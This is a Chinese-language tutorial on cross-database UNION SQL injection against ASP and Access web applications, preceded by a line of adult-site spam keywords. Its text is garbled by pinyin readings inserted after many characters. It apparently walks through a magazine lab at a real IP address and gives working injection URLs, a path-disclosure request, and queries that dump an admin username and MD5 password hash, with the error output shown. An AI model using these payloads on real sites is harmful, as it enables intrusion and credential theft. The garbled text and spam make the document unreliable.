国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　大家還記得mssql的跨庫(kù)查詢(xún)吧，其實(shí)在access中也可以實(shí)現(xiàn)2個(gè)數(shù)據(jù)之間的交叉查詢(xún)。下面我就給大家介紹下access的跨庫(kù)查詢(xún)。

　　首先讓我們看看在access里是怎樣實(shí)現(xiàn)對(duì)mdb文件進(jìn)行查詢(xún)的，我們隨便創(chuàng)建個(gè)空，對(duì)數(shù)據(jù)庫(kù)D:\daos\db\daidalos.mdb里的admin表的內(nèi)容進(jìn)行查詢(xún)，SQL語(yǔ)句為：

　　SELECT * from admin in "D:\daos\db\daidalos.mdb"

　　查詢(xún)后，成功返回目標(biāo)數(shù)據(jù)庫(kù)里表admin表里的內(nèi)容：

　　在實(shí)際的asp注射中，要同時(shí)進(jìn)行2個(gè)select，如果大家熟悉php+mysql注射的話(huà)，應(yīng)該很容易想到使用union進(jìn)行聯(lián)合查詢(xún)，在access里我們照樣可以使用，使用union查詢(xún)還有一個(gè)好處就是不要去對(duì)數(shù)據(jù)進(jìn)行一個(gè)一個(gè)字符的去猜，而可以象mysql+php注射一樣直接暴出字段里的數(shù)據(jù)(具體的mix已經(jīng)寫(xiě)了一篇詳細(xì)的文章)。從上面可以看出來(lái)要實(shí)現(xiàn)跨庫(kù)查詢(xún)必修要下面2個(gè)條件：

　　使用union查詢(xún)必須知道前一個(gè)select里表的字段數(shù)

　　必須知道目標(biāo)數(shù)據(jù)庫(kù)的所在位置，絕對(duì)路徑。

　　條件1我們可以根據(jù)提示錯(cuò)誤信息來(lái)手工猜解，也可以通過(guò)程序自動(dòng)實(shí)現(xiàn)。

　　條件2 這個(gè)是個(gè)難點(diǎn)，不過(guò)我們可以通過(guò)利用“access暴庫(kù)”來(lái)實(shí)現(xiàn)，有人會(huì)說(shuō)既然可以知道數(shù)據(jù)位置，那不直接下載得拉，其實(shí)不然，現(xiàn)在的數(shù)據(jù)庫(kù)一般防止下載，有的根本不web目錄下。

　　在黑防第四輪實(shí)驗(yàn)室的第一關(guān)，就是設(shè)置的2個(gè)asp+access的下載系統(tǒng)，一個(gè)是雨點(diǎn)下載系統(tǒng)，一個(gè)是盜帥下載系統(tǒng)。 經(jīng)過(guò)測(cè)試 盜帥下載系統(tǒng)可以暴出數(shù)據(jù)庫(kù)但是不讓下載，似乎也沒(méi)什么地方可以注射，而雨點(diǎn)下載系統(tǒng)就是漏洞百出了，數(shù)據(jù)庫(kù)可以暴且可以直接下載，還可以注射。不過(guò)雨點(diǎn)的后臺(tái)很簡(jiǎn)單，沒(méi)什么可以利用的地方，我們的目標(biāo)就放在得到盜帥后臺(tái)密碼上了，下面我就給大家演示下，通過(guò)雨點(diǎn)系統(tǒng)的注射點(diǎn)對(duì)盜帥系統(tǒng)的跨庫(kù)查詢(xún)而得到盜帥的后臺(tái)密碼：

　　我們得知雨點(diǎn)系統(tǒng)的list.asp可以注射，我們先去要得到union里的數(shù)據(jù)表字段數(shù)，提交：

　　http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

　　返回：

　　 JET Database Engine 錯(cuò)誤 '80040e14'

　　在聯(lián)合查詢(xún)中所選定的兩個(gè)數(shù)據(jù)表或查詢(xún)中的列數(shù)不匹配。

　　/yddown/list.asp，行51

　　字段不對(duì)，我寫(xiě)了個(gè)perl腳本自動(dòng)猜，(代碼見(jiàn)后)

　　當(dāng)我們提交：

　　http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

　　無(wú)錯(cuò)誤返回：

　　哈哈! 我們已經(jīng)得到字段數(shù)了，并且我們可以得到在字段1的我位置，可以顯示我們查詢(xún)的數(shù)據(jù)。

　　現(xiàn)在還就差盜帥的數(shù)據(jù)庫(kù)位置了，簡(jiǎn)單我們暴庫(kù)，提交：

　　http://219.237.81.46/dsdown%5cregs.asp

　　成功返回路徑：

　　Microsoft JET Database Engine 錯(cuò)誤 '80004005'

　　'D:\111\db\kljdsld.asa'不是一個(gè)有效的路徑。 確定路徑名稱(chēng)拼寫(xiě)是否正確，以及是否連接到文件存放的。

　　/dsdown/db/user.asp，行6

　　(注意：這樣得到的的路徑不一定是“完整”的，真正的路徑為：D:\111\dsdown\db\kljdsld.asa)

　　下面我們跨庫(kù)，構(gòu)造url如下：

　　http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

　　上面的語(yǔ)句是，union查詢(xún)數(shù)據(jù)D:\111\db\kljdsld.asa里表admin里id=1的字段admin的數(shù)據(jù)，如果成功將直接暴出后臺(tái)管理的用戶(hù)名：

　　得到用戶(hù)名為admin 我們接著暴密碼：

　　http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

　　如圖：

　　得到密碼為32位的md5加密的hash：77e6cbb3f9468eadb655ae6826357922，我們跨庫(kù)查詢(xún)成功，這里我只是為大家演示下跨庫(kù)查詢(xún)，黑防那里就不管咯 : )。

　　小結(jié)

　　本文主要是給大家介紹了2個(gè)非常有用的方法，第1 我們?cè)赼sp注射時(shí)不一頂要一個(gè)個(gè)字符去猜，那樣遇到中文的很麻煩，直接用union替代數(shù)據(jù)可以直接暴出數(shù)據(jù)，不關(guān)是中文還是特殊字符，都可以一步到位，第2 就是跨庫(kù)了，使用很靈活，可以讓你在滲透時(shí)，有意想不到的收獲。